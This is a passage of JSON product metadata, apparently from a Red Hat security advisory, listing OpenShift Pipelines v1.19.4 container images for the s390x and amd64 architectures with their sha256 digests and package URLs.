"product_id": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-git-init-rhel9@sha256%3A4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764942761"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-api-rhel9@sha256%3A96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764818880"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-db-migration-rhel9@sha256%3A4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764819005"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-ui-rhel9@sha256%3Acdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764819019"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-controller-rhel9@sha256%3A1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845239"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-entrypoint-rhel9@sha256%3A068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845346"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-events-rhel9@sha256%3Afe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845294"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-nop-rhel9@sha256%3Ab6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845253"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-resolvers-rhel9@sha256%3A689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845383"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-sidecarlogresults-rhel9@sha256%3A4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845278"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-webhook-rhel9@sha256%3Ae5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845382"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-workingdirinit-rhel9@sha256%3Ab5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pruner-controller-rhel9@sha256%3A0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764774996"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-api-rhel9@sha256%3A63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764775225"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-retention-policy-agent-rhel9@sha256%3Ae8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764775225"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-watcher-rhel9@sha256%3A1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764635259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-controller-rhel9@sha256%3A2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769550"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-core-interceptors-rhel9@sha256%3A457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769552"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-eventlistenersink-rhel9@sha256%3A1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769677"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-webhook-rhel9@sha256%3A171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769674"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-console-plugin-rhel9@sha256%3A1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771718"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-manual-approval-gate-controller-rhel9@sha256%3A8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764777983"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-manual-approval-gate-webhook-rhel9@sha256%3A5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771736"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-cli-rhel9@sha256%3A37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830200"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-controller-rhel9@sha256%3Af772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830290"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-watcher-rhel9@sha256%3A7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830107"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-webhook-rhel9@sha256%3A0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830289"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-cache-rhel9@sha256%3Af8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771720"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-chains-controller-rhel9@sha256%3A39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-git-init-rhel9@sha256%3A8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764942761"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-api-rhel9@sha256%3A6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764818880"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-db-migration-rhel9@sha256%3A1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764819005"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-ui-rhel9@sha256%3A58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764819019"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-controller-rhel9@sha256%3A887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845239"
}
}
},
{
"category": "product_version",
